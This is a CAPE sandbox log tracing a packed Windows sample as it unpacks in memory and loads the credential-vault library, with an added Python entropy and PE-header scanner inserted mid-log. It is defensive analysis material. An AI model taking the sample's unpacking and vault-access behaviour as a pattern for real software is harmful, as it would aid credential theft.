Analysis

Category: FILE
Package: Extraction
Started: 2020-01-14 13:45:20
Completed: 2020-01-14 13:49:14
Duration: 234 seconds

Options:
route = internet
procdump = 0

Log:
2020-01-14 13:45:22,000 [root] INFO: Date set to: 01-14-20, time set to: 13:45:22, timeout set to: 200
2020-01-14 13:45:22,108 [root] DEBUG: Starting analyzer from: C:\vtfynxjgxy
2020-01-14 13:45:22,108 [root] DEBUG: Storing results at: C:\FfIKSGRI
2020-01-14 13:45:22,108 [root] DEBUG: Pipe server name: \\.\PIPE\TWHaMftf
2020-01-14 13:45:22,108 [root] INFO: Analysis package "Extraction" has been specified.
2020-01-14 13:45:24,979 [root] DEBUG: Started auxiliary module Browser
2020-01-14 13:45:24,994 [root] DEBUG: Started auxiliary module Curtain
2020-01-14 13:45:24,994 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2020-01-14 13:45:26,601 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-01-14 13:45:26,601 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-01-14 13:45:26,601 [root] DEBUG: Started auxiliary module DigiSig
2020-01-14 13:45:26,601 [root] DEBUG: Started auxiliary module Disguise
2020-01-14 13:45:26,617 [root] DEBUG: Started auxiliary module Human
2020-01-14 13:45:26,617 [root] DEBUG: Started auxiliary module Screenshots
2020-01-14 13:45:26,617 [root] DEBUG: Started auxiliary module Sysmon
2020-01-14 13:45:26,617 [root] DEBUG: Started auxiliary module Usage
2020-01-14 13:45:26,617 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Extraction
2020-01-14 13:45:26,617 [root] INFO: Analyzer: DLL_64 set to Extraction_x64.dll from package modules.packages.Extraction
2020-01-14 13:45:26,632 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe" with arguments "" with pid 1520
2020-01-14 13:45:26,632 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:26,632 [lib.api.process] INFO: 32-bit DLL to inject is C:\vtfynxjgxy\dll\sezCHK.dll, loader C:\vtfynxjgxy\bin\NCLoagX.exe
2020-01-14 13:45:26,632 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:26,648 [root] DEBUG: Loader: Injecting process 1520 (thread 1180) with C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:26,648 [root] DEBUG: Process image base: 0x00400000
2020-01-14 13:45:26,648 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:26,648 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-01-14 13:45:26,648 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:26,648 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1520
2020-01-14 13:45:28,676 [lib.api.process] INFO: Successfully resumed process with pid 1520
2020-01-14 13:45:28,676 [root] INFO: Added new process to list with pid: 1520
2020-01-14 13:45:28,816 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-01-14 13:45:28,816 [root] DEBUG: Process dumps disabled.
2020-01-14 13:45:29,082 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-01-14 13:45:29,082 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:29,082 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:29,082 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:29,082 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:29,082 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77a00000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x77a5124a, Wow64PrepareForException: 0x0
2020-01-14 13:45:29,082 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x300000
2020-01-14 13:45:29,082 [root] DEBUG: Debugger initialised.
2020-01-14 13:45:29,082 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 1520 at 0x74ec0000, image base 0x400000, stack from 0x186000-0x190000
2020-01-14 13:45:29,082 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe".
2020-01-14 13:45:29,082 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00400000) returned 0x00000000.
2020-01-14 13:45:29,082 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-01-14 13:45:29,082 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00400000) -> AllocationBase 0x00400000 RegionSize 0x4096.
2020-01-14 13:45:29,082 [root] DEBUG: AddTrackedRegion: EntryPoint 0x7d348, Entropy 6.803339e+00
2020-01-14 13:45:29,082 [root] DEBUG: AddTrackedRegion: New region at 0x00400000 size 0x1000 added to tracked regions.
2020-01-14 13:45:29,082 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-01-14 13:45:29,082 [root] INFO: Monitor successfully loaded in process with pid 1520.
2020-01-14 13:45:29,176 [root] DEBUG: Allocation: 0x00310000 - 0x00311000, size: 0x1000, protection: 0x40.
2020-01-14 13:45:29,190 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-01-14 13:45:29,190 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-01-14 13:45:29,190 [root] DEBUG: ProcessImageBase: EP 0x0007D348 image base 0x00400000 size 0x0 entropy 6.811265e+00.
2020-01-14 13:45:29,190 [root] DEBUG: AllocationHandler: Adding allocation to tracked region list: 0x00310000, size: 0x1000.
2020-01-14 13:45:29,207 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00310000) returned 0x00000000.
2020-01-14 13:45:29,207 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-01-14 13:45:29,207 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00310000) -> AllocationBase 0x00310000 RegionSize 0x4096.
2020-01-14 13:45:29,207 [root] DEBUG: AddTrackedRegion: New region at 0x00310000 size 0x1000 added to tracked regions.
2020-01-14 13:45:39,283 [root] DEBUG: ProtectionHandler: Address 0x00477075 already in tracked region at 0x00400000, size 0x1000
2020-01-14 13:45:39,283 [root] DEBUG: ProtectionHandler: Address: 0x00477075 (alloc base 0x00400000), NumberOfBytesToProtect: 0x5d88, NewAccessProtection: 0x40
2020-01-14 13:45:39,283 [root] DEBUG: ProtectionHandler: Increased region size at 0x00477075 to 0x7cdfd.
2020-01-14 13:45:39,283 [root] DEBUG: ProtectionHandler: Updated region protection at 0x00477075 to 0x40.
2020-01-14 13:45:39,299 [root] DEBUG: ProcessImageBase: EP 0x0007D348 image base 0x00400000 size 0x0 entropy 6.812066e+00.
2020-01-14 13:45:39,299 [root] DEBUG: Allocation: 0x003F0000 - 0x003F1000, size: 0x1000, protection: 0x40.
2020-01-14 13:45:39,299 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-01-14 13:45:39,299 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-01-14 13:45:39,315 [root] DEBUG: ProcessImageBase: EP 0x0007D348 image base 0x00400000 size 0x0 entropy 6.768053e+00.
2020-01-14 13:45:39,315 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00310000.
2020-01-14 13:45:39,315 [root] DEBUG: AllocationHandler: Adding allocation to tracked region list: 0x003F0000, size: 0x1000.
2020-01-14 13:45:39,315 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x003F0000) returned 0x00000000.
2020-01-14 13:45:39,315 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-01-14 13:45:39,315 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x003F0000) -> AllocationBase 0x003F0000 RegionSize 0x4096.
2020-01-14 13:45:39,331 [root] DEBUG: AddTrackedRegion: New region at 0x003F0000 size 0x1000 added to tracked regions.
2020-01-14 13:45:39,799 [root] DEBUG: set_caller_info: Adding region at 0x003F0000 to caller regions list (ntdll::memcpy).
2020-01-14 13:45:39,799 [root] DEBUG: set_caller_info: Caller at 0x003F001A in tracked regions.
2020-01-14 13:45:39,799 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-01-14 13:45:39,799 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-01-14 13:45:39,799 [root] DEBUG: ProcessImageBase: EP 0x0007D348 image base 0x00400000 size 0x0 entropy 6.768053e+00.
2020-01-14 13:45:39,799 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00310000.
2020-01-14 13:45:39,799 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003F0000.
2020-01-14 13:45:39,799 [root] DEBUG: DumpPEsInRange: Scanning range 0x3f0000 - 0x3f1000.
2020-01-14 13:45:39,799 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x3f0000-0x3f1000.
2020-01-14 13:45:39,799 [root] DEBUG: DumpPEsInTrackedRegion: No PE images found in range range 0x003F0000 - 0x003F1000.
2020-01-14 13:45:39,799 [root] DEBUG: set_caller_info: Adding region at 0x01D50000 to caller regions list (kernel32::GetSystemTime).
2020-01-14 13:45:39,799 [root] DEBUG: DumpPEsInRange: Scanning range 0x3f0000 - 0x3f1000.
2020-01-14 13:45:39,799 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x3f0000-0x3f1000.
2020-01-14 13:45:39,799 [root] DEBUG: DumpPEsInTrackedRegion: No PE images found in range range 0x003F0000 - 0x003F1000.
2020-01-14 13:45:39,829 [root] DEBUG: DumpMemory: CAPE output file C:\FfIKSGRI\CAPE\1520_67160458039251614212020 successfully created, size 0x1000
2020-01-14 13:45:39,829 [root] INFO: Added new CAPE file to list with path: C:\FfIKSGRI\CAPE\1520_67160458039251614212020
2020-01-14 13:45:39,845 [root] DEBUG: DumpRegion: Dumped stack region from 0x003F0000, size 0x1000.
2020-01-14 13:45:39,845 [root] DEBUG: ProcessTrackedRegion: dumped executable memory range at 0x003F0000.
2020-01-14 13:45:39,845 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x3f0000 - 0x3f1000.
2020-01-14 13:45:39,845 [root] DEBUG: DumpMemory: CAPE output file C:\FfIKSGRI\CAPE\1520_186718802039251614212020 successfully created, size 0x1000
2020-01-14 13:45:39,845 [root] INFO: Added new CAPE file to list with path: C:\FfIKSGRI\CAPE\1520_186718802039251614212020
2020-01-14 13:45:39,845 [root] DEBUG: DumpRegion: Dumped stack region from 0x003F0000, size 0x1000.
2020-01-14 13:45:39,845 [root] DEBUG: ProcessTrackedRegion: dumped executable memory range at 0x003F0000.
2020-01-14 13:45:39,845 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x3f0000 - 0x3f1000.
2020-01-14 13:45:39,877 [root] INFO: Announced 32-bit process name: ThGUgOMMWUNV0z.exe pid: 932
2020-01-14 13:45:39,892 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:39,892 [lib.api.process] INFO: 32-bit DLL to inject is C:\vtfynxjgxy\dll\sezCHK.dll, loader C:\vtfynxjgxy\bin\NCLoagX.exe
2020-01-14 13:45:39,892 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:39,892 [root] DEBUG: Loader: Injecting process 932 (thread 1116) with C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,892 [root] DEBUG: Process image base: 0x00400000
2020-01-14 13:45:39,892 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,892 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-01-14 13:45:39,892 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,892 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 932
2020-01-14 13:45:39,907 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-01-14 13:45:39,924 [root] DEBUG: DLL unloaded from 0x00400000.
2020-01-14 13:45:39,924 [root] INFO: Announced 32-bit process name: ThGUgOMMWUNV0z.exe pid: 932
2020-01-14 13:45:39,924 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:39,924 [lib.api.process] INFO: 32-bit DLL to inject is C:\vtfynxjgxy\dll\sezCHK.dll, loader C:\vtfynxjgxy\bin\NCLoagX.exe
2020-01-14 13:45:39,940 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:39,940 [root] DEBUG: Loader: Injecting process 932 (thread 1116) with C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,940 [root] DEBUG: Process image base: 0x00400000
2020-01-14 13:45:39,940 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,940 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-01-14 13:45:39,940 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,940 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 932
2020-01-14 13:45:39,940 [root] INFO: Announced 32-bit process name: ThGUgOMMWUNV0z.exe pid: 932
2020-01-14 13:45:39,940 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:39,940 [lib.api.process] INFO: 32-bit DLL to inject is C:\vtfynxjgxy\dll\sezCHK.dll, loader C:\vtfynxjgxy\bin\NCLoagX.exe
2020-01-14 13:45:39,954 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:39,954 [root] DEBUG: Loader: Injecting process 932 (thread 0) with C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,954 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 1116, handle 0x9c
2020-01-14 13:45:39,954 [root] DEBUG: Process image base: 0x00400000
2020-01-14 13:45:39,954 [root] DEBUG: InjectDllViaIAT: Executable DOS header invalid.
2020-01-14 13:45:39,954 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,954 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 932
2020-01-14 13:45:39,954 [root] INFO: Announced 32-bit process name: ThGUgOMMWUNV0z.exe pid: 932
2020-01-14 13:45:39,954 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:39,954 [lib.api.process] INFO: 32-bit DLL to inject is C:\vtfynxjgxy\dll\sezCHK.dll, loader C:\vtfynxjgxy\bin\NCLoagX.exe
2020-01-14 13:45:39,970 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:39,970 [root] DEBUG: Loader: Injecting process 932 (thread 0) with C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,970 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 1116, handle 0x9c
2020-01-14 13:45:39,970 [root] DEBUG: Process image base: 0x00400000
2020-01-14 13:45:39,970 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x0047D348)
2020-01-14 13:45:39,970 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,970 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-01-14 13:45:39,970 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,986 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 932
2020-01-14 13:45:39,986 [root] INFO: Announced 32-bit process name: ThGUgOMMWUNV0z.exe pid: 932
2020-01-14 13:45:39,986 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:39,986 [lib.api.process] INFO: 32-bit DLL to inject is C:\vtfynxjgxy\dll\sezCHK.dll, loader C:\vtfynxjgxy\bin\NCLoagX.exe
2020-01-14 13:45:39,986 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:39,986 [root] DEBUG: Loader: Injecting process 932 (thread 1116) with C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,986 [root] DEBUG: Process image base: 0x00400000
2020-01-14 13:45:39,986 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,986 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-01-14 13:45:39,986 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,986 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 932
2020-01-14 13:45:40,002 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 1520).
2020-01-14 13:45:40,002 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-01-14 13:45:40,002 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-01-14 13:45:40,002 [root] DEBUG: ProcessImageBase: EP 0x0007D348 image base 0x00400000 size 0x0 entropy 6.768053e+00.
2020-01-14 13:45:40,002 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00310000.
2020-01-14 13:45:40,002 [root] DEBUG: DumpPEsInRange: Scanning range 0x310000 - 0x311000.
2020-01-14 13:45:40,002 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x310000-0x311000.
2020-01-14 13:45:40,002 [root] DEBUG: DumpPEsInTrackedRegion: No PE images found in range range 0x00310000 - 0x00311000.
2020-01-14 13:45:40,002 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x47cdfd.
2020-01-14 13:45:40,002 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-01-14 13:45:40,002 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2020-01-14 13:45:40,002 [root] DEBUG: Process dumps disabled.
2020-01-14 13:45:40,002 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-01-14 13:45:40,002 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-01-14 13:45:40,017 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:40,017 [root] DEBUG: DumpProcess: Module entry point VA is 0x0007D348.
2020-01-14 13:45:40,017 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x47cdfd.
2020-01-14 13:45:40,017 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2020-01-14 13:45:40,017 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-01-14 13:45:40,017 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-01-14 13:45:40,017 [root] DEBUG: DumpProcess: Module entry point VA is 0x0007D348.
2020-01-14 13:45:40,032 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-01-14 13:45:40,032 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77a00000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x77a5124a, Wow64PrepareForException: 0x0
2020-01-14 13:45:40,032 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x3d0000
2020-01-14 13:45:40,049 [root] DEBUG: Debugger initialised.
2020-01-14 13:45:40,049 [root] INFO: Added new CAPE file to list with path: C:\FfIKSGRI\CAPE\1520_47717264440251614212020
2020-01-14 13:45:40,049 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 932 at 0x74ec0000, image base 0x400000, stack from 0x186000-0x190000
2020-01-14 13:45:40,049 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x89a00.
2020-01-14 13:45:40,063 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe".
2020-01-14 13:45:40,063 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00400000) returned 0x00000000.
2020-01-14 13:45:40,063 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400200-0x47cdfd.
2020-01-14 13:45:40,063 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-01-14 13:45:40,063 [root] DEBUG: DumpPEsInTrackedRegion: Dumped 1 PE image(s) from range 0x00400000 - 0x0047CDFD.
2020-01-14 13:45:40,063 [root] DEBUG: ProcessTrackedRegion: Found and dumped PE image(s) in range 0x00400000 - 0x0047CDFD.
2020-01-14 13:45:40,063 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00400000) -> AllocationBase 0x00400000 RegionSize 0x663552.
2020-01-14 13:45:40,063 [root] DEBUG: AddTrackedRegion: EntryPoint 0x139de, Entropy 1.393088e+00
2020-01-14 13:45:40,063 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x400000 - 0x47cdfd.
2020-01-14 13:45:40,079 [root] DEBUG: AddTrackedRegion: New region at 0x00400000 size 0xa2000 added to tracked regions.
2020-01-14 13:45:40,095 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-01-14 13:45:40,095 [root] INFO: Added new process to list with pid: 932
2020-01-14 13:45:40,095 [root] INFO: Monitor successfully loaded in process with pid 932.
2020-01-14 13:45:40,111 [root] INFO: Added new CAPE file to list with path: C:\FfIKSGRI\CAPE\1520_115079102440251614212020
2020-01-14 13:45:40,111 [root] DEBUG: DLL loaded at 0x759C0000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-01-14 13:45:40,111 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x89a00.
2020-01-14 13:45:40,127 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2020-01-14 13:45:40,157 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400200-0x47cdfd.
2020-01-14 13:45:40,157 [root] DEBUG: DumpPEsInTrackedRegion: Dumped 1 PE image(s) from range 0x00400000 - 0x0047CDFD.
2020-01-14 13:45:40,157 [root] DEBUG: ProcessTrackedRegion: Found and dumped PE image(s) in range 0x00400000 - 0x0047CDFD.
2020-01-14 13:45:40,157 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x400000 - 0x47cdfd.
2020-01-14 13:45:40,174 [root] DEBUG: DumpMemory: CAPE output file C:\FfIKSGRI\CAPE\1520_61330587240251614212020 successfully created, size 0x1000
2020-01-14 13:45:40,204 [root] INFO: Added new CAPE file to list with path: C:\FfIKSGRI\CAPE\1520_61330587240251614212020
2020-01-14 13:45:40,220 [root] DEBUG: DumpRegion: Dumped stack region from 0x00310000, size 0x1000.
2020-01-14 13:45:40,220 [root] DEBUG: ProcessTrackedRegion: dumped executable memory range at 0x00310000.
2020-01-14 13:45:40,220 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x310000 - 0x311000.
2020-01-14 13:45:40,220 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003F0000.
2020-01-14 13:45:40,220 [root] DEBUG: DLL unloaded from 0x77780000.
2020-01-14 13:45:40,220 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 1520).
2020-01-14 13:45:40,220 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-01-14 13:45:40,220 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-01-14 13:45:40,220 [root] DEBUG: DLL loaded at 0x755B0000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-01-14 13:45:40,236 [root] DEBUG: ProcessImageBase: EP 0x0007D348 image base 0x00400000 size 0x0 entropy 6.768053e+00.
2020-01-14 13:45:40,236 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00310000.
2020-01-14 13:45:40,236 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003F0000.
2020-01-14 13:45:40,236 [root] INFO: Notified of termination of process with pid 1520.
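The lines above record one full Extraction cycle for pid 1520: the main image at 0x400000 and two fresh RWX (protection 0x40) 0x1000-byte allocations are added as tracked regions, each region's entropy is logged (6.80-6.81 bits per byte at the image base, a level consistent with packed or encrypted content), the tracked image region grows to 0x7cdfd bytes once the sample sets PAGE_EXECUTE_READWRITE on 0x5d88 bytes at 0x477075, and at NtTerminateProcess the package scans each region for PE headers, dumps the image it finds at 0x400000 (dump size 0x89a00), rescans from 0x400200 to the end of the region, and dumps the two small executable regions as raw memory. The Python below is an added illustration of the two measurements driving that cycle, a Shannon entropy reading and a header scan for PE images in a byte range. It is not CAPE's code: the scanner here requires both an MZ magic and a valid e_lfanew pointing at a PE signature, whereas CAPE's ScanForDisguisedPE is separate code and tolerates more damage to the DOS header (an assumption about its behaviour, not something the log shows). The sample region is constructed inline.

```python
import math
import struct


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for
    uniformly random bytes. Packed or encrypted code usually sits well above
    6.5; the log above reports 6.80-6.81 for the image at 0x400000."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def find_pe_images(region: bytes, base: int, skip_after_hit: int = 0x200) -> list:
    """Return the virtual addresses of PE headers found in `region`.

    A candidate is an 'MZ' DOS header whose e_lfanew (offset 0x3C) points,
    inside the region, at a 'PE\\0\\0' signature. After a hit the scan resumes
    `skip_after_hit` bytes later, mirroring the log's rescan of
    0x400200-0x47cdfd after the image at 0x400000 was dumped.
    Assumption: this added check needs both signatures; CAPE's own scanner
    is separate code and accepts more damaged headers.
    """
    hits = []
    off = 0
    while True:
        off = region.find(b"MZ", off)
        if off < 0 or off + 0x40 > len(region):
            break
        e_lfanew = struct.unpack_from("<I", region, off + 0x3C)[0]
        pe_off = off + e_lfanew
        if (0x40 <= e_lfanew < 0x1000 and pe_off + 4 <= len(region)
                and region[pe_off:pe_off + 4] == b"PE\0\0"):
            hits.append(base + off)
            off += skip_after_hit
        else:
            off += 1
    return hits


def describe_region(region: bytes, base: int) -> dict:
    """One tracked-region report: base, size, entropy and PE images located."""
    return {
        "base": base,
        "size": len(region),
        "entropy": round(shannon_entropy(region), 6),
        "pe_images": find_pe_images(region, base),
    }


def build_sample_region() -> bytes:
    """Constructed sample (not taken from the analysis above): a 0x1000-byte
    region with a minimal MZ/PE header at offset 0 and a decoy 'MZ' at 0x300
    whose e_lfanew points outside the region."""
    region = bytearray(0x1000)
    region[0:2] = b"MZ"
    struct.pack_into("<I", region, 0x3C, 0x80)        # e_lfanew -> 0x80
    region[0x80:0x84] = b"PE\0\0"
    region[0x300:0x302] = b"MZ"                       # decoy magic
    struct.pack_into("<I", region, 0x33C, 0xFFFFFF)   # bogus e_lfanew
    return bytes(region)


if __name__ == "__main__":
    print(describe_region(build_sample_region(), 0x400000))
```

Run against a real dump (for example the 0x1000-byte CAPE output files listed above, read with `open(path, "rb").read()`), `describe_region` gives the same two numbers the log prints per region, which is a quick way to decide whether a "dumped executable memory range" is worth disassembling or is just a stub.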
2020-01-14 13:45:40,516 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\system32\vaultcli (0xc000 bytes).
2020-01-14 13:45:40,595 [root] DEBUG: DLL unloaded from 0x766D0000.
2020-01-14 13:45:40,720 [root] INFO: Announced starting service "VaultSvc"
2020-01-14 13:45:40,720 [root] INFO: Attaching to Service Control Manager (services.exe - pid 464)
2020-01-14 13:45:40,750 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:40,750 [lib.api.process] INFO: 64-bit DLL to inject is C:\vtfynxjgxy\dll\ascwMn.dll, loader C:\vtfynxjgxy\bin\IXCtdmJe.exe
2020-01-14 13:45:40,766 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:40,766 [root] DEBUG: Loader: Injecting process 464 (thread 0) with C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:40,766 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 684, handle 0x84
2020-01-14 13:45:40,766 [root] DEBUG: Process image base: 0x00000000FF330000
2020-01-14 13:45:40,782 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-01-14 13:45:40,782 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-01-14 13:45:40,798 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-01-14 13:45:40,798 [root] DEBUG: Process dumps disabled.
2020-01-14 13:45:40,812 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:40,844 [root] WARNING: Unable to place hook on LockResource
2020-01-14 13:45:40,859 [root] WARNING: Unable to hook LockResource
2020-01-14 13:45:40,921 [root] DEBUG: Debugger initialised.
2020-01-14 13:45:40,937 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 464 at 0x0000000074DC0000, image base 0x00000000FF330000, stack from 0x0000000001DE6000-0x0000000001DF0000
2020-01-14 13:45:40,937 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2020-01-14 13:45:40,937 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00000000FF330000) returned 0x0000000000000000.
